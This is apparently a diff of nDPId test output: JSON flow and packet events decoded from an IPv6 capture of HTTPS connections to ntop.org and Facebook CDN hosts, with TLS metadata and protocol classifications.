-00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1448269143539,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269143539,"pkt":"eKzApw1M9LUv\/K\/Cht1gwAAAACAGKyoDKIAQED8g+s6wDAAAJd4qAA1AAAEAA3qswP\/+pw1MAbuddHokDODe2wgFgBAAa0\/sAAABAQgKcXBUrRINT9U="} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269144306,"flow_last_seen":1448269144306,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269144306,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1448269144306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144306,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAsMAgAAAAAAAACagSYBu7SkSa3RTHVvgBABRwoCAAABAQgKEg18wD9sNbI="} 
-00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1448269144348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144348,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGNSoAFFBACwwCAAAAAAAAAJoqAA1AAAEAA3qswP\/+pw1MAbuBJtFMdW+0pEmugBABd0eeAAABAQgKP2zlshINJLA="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269144450,"flow_last_seen":1448269144450,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269144450,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1448269144450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269144450,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkoIBuwefNhUAAAAAoAJwgGsaAAACBAWgBAIIChINfOQAAAAAAQMDBw=="} 
-00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1448269144475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269144475,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGNyoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSgnjE+S8HnzYWoBJvkOerAAACBAWgBAIICgBesqQSDXzkAQMDCA=="} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1448269144475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144475,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkoIBuwefNhZ4xPkwgBAA4WsSAAABAQgKEg186gBesqQ="} -00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269144450,"flow_last_seen":1448269144475,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269144475,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} 
-00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269144450,"flow_last_seen":1448269144502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269144502,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -01398{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269144450,"flow_last_seen":1448269144508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269144508,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269145458,"flow_last_seen":1448269145458,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269145458,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1448269145458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269145458,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAS6SoBu3aemNPcvXclgBAA6hVxAAABAQgKEg194OPdWG4="} 
-00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1448269145478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269145478,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBAAQgDAAAAAAAAEBIqAA1AAAEAA3qswP\/+pw1MAbvpKty9dyV2npjUgBAA8BoIAAABAQgK494IbhIM+eU="} -00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269146905,"flow_last_seen":1448269146905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269146905,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1448269146905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146905,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z4wBuwtKuykAAAAAoAJwgNR+AAACBAWgBAIIChINf0kAAAAAAQMDBw=="} 
-00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269146905,"flow_last_seen":1448269146905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269146905,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1448269146905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146905,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z44Bu8SPrfMAAAAAoAJwgNR+AAACBAWgBAIIChINf0kAAAAAAQMDBw=="} -00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146912,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOyoCJvAArQGXAAAAAAAAAjYqAA1AAAEAA3qswP\/+pw1MAbvPjun6mTbEj630oBJswJfaAAACBAV8BAIIChvn+wESDX9JAQMDBQ=="} 
-00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269146912,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z44Bu8SPrfTp+pk3gBAA4dR2AAABAQgKEg1\/Sxvn+wE="} -00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146912,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOyoCJvAArQGXAAAAAAAAAjYqAA1AAAEAA3qswP\/+pw1MAbvPjOjBmT8LSrsqoBJswEUcAAACBAV8BAIIChvn+wESDX9JAQMDBQ=="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269146912,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z4wBuwtKuyrowZlAgBAA4dR2AAABAQgKEg1\/Sxvn+wE="} 
-00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} 
-01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":628,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}} -00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3080,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":471,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}} 
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1448269146905,"flow_last_seen":1448269146970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1448269146905,"flow_last_seen":1448269146966,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00673{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1448269127395,"flow_last_seen":1448269127510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":506,"flow_tot_l4_payload_len":1009,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1448269127395,"flow_last_seen":1448269127510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":506,"flow_tot_l4_payload_len":1009,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269138575,"flow_last_seen":1448269138575,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269138575,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1448269138575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138575,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkm4Bu5jVbXIAAAAAoAJwgGsaAAACBAWgBAIIChINdycAAAAAAQMDBw=="} +00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269138575,"flow_last_seen":1448269138575,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269138575,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1448269138575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138575,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknABu7DxnU0AAAAAoAJwgGsaAAACBAWgBAIIChINdycAAAAAAQMDBw=="} 
+00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1448269138600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138600,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOCoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSbiqmXmyY1W1zoBJvkBOIAAACBAWgBAIICgBerOcSDXcnAQMDCA=="} 